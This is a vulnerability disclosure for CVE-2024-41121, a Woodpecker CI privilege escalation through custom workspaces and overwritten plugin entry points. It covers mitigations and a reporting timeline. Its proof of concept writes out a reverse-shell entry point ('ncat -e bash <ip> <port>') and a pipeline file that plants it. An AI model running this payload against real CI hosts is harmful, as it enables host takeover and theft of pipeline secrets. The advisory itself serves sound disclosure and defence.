CVE-2024-41121 ‒ Privilege escalation via custom workspace

Authored by:
Metrics: cve.org

Description

Woodpecker is a simple yet powerful CI/CD engine with great extensibility. However, a vulnerability was identified that allows any user with permission to create workflows and trigger pipeline runs to takeover the host. This vulnerability poses two potential risks: 1. Malicious workflows could lead to a host takeover of the agent executing the workflow. 2. Attackers could extract sensitive secrets that are typically to the plugins, by overwriting their entry points. These issues have been addressed in release version 2.7.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Vulnerability

Woodpecker build pipelines allow users to specify a base container image. By default, Woodpecker executes certain plugin images in a privileged container.

// PrivilegedPlugins can be changed by 'WOODPECKER_ESCALATE' at runtime.
var PrivilegedPlugins = []string{
 "plugins/docker",
 "plugins/gcr",
 "plugins/ecr",
 "woodpeckerci/plugin-docker-buildx",
 "codeberg.org/woodpecker-plugins/docker-buildx",
}

Source

This behavior introduces a privilege escalation risk. If an attacker gains code execution within a privileged container, they can escalate privileges: For example, by specifying a custom workspace (bind-mounted inside the container) and overwriting the container’s entry point, a malicious actor could execute arbitrary commands, such as launching a reverse shell.

POC

The following demonstrates how this vulnerability could be exploited. Create a repo with the following content:

  • <repo>/fake-local/bin/dockerd-entrypoint.sh
#!/bin/sh

/usr/local/ncat -e /usr/local/bash <ip> <port>

  • <repo>/bash (statically linked bash)

  • <repo>/ncat (statically linked ncat)

  • <repo>/.woodpecker.yaml

workspace:
  base: /usr/local/

steps:
- name: prepare
  image: alpine
  commands:
    - mkdir -p /usr/local/bin/
    - cp fake-local/bin/dockerd-entrypoint.sh /usr/local/bin/dockerd-entrypoint.sh
    - cp ncat /usr/local/ncat
    - cp bash /usr/local/bash
    - chmod +x /usr/local/bin/dockerd-entrypoint.sh
    - chmod +x /usr/local/ncat
    - chmod +x /usr/local/bash
- name: drone
  image: plugins/docker

By using the configuration above, an attacker can replace the entry point and achieve arbitrary code execution.

Mitigations

The following fixes address this issue:

  1. Restrict workspace paths: Workspaces are now always relative to a base path (/woodpecker). Fixed in PR #3933
  2. Plugins run unprivileged by default: All plugins now run unprivileged mode by default. Fixed in PR #4053

Timeline

DateAction
13.07.2024Neodyme reports the issue via email to security@woodpecker-ci.org
14.07.2024The Woodpecker team acknowledges the report
15.07.2024The Woodpecker team triages the issue and provides an action plan
16.07.2024The Woodpecker team adds Neodyme employees to their security repository for further discussion
18.07.2024The Woodpecker team fixes the workspace issue here
19.07.2024The Woodpecker team publishes a security disclosure
31.08.2024The Woodpecker team removes 3rd-party default privileged plugins here
02.09.2024The Woodpecker team removes all default privileged plugins here
Share: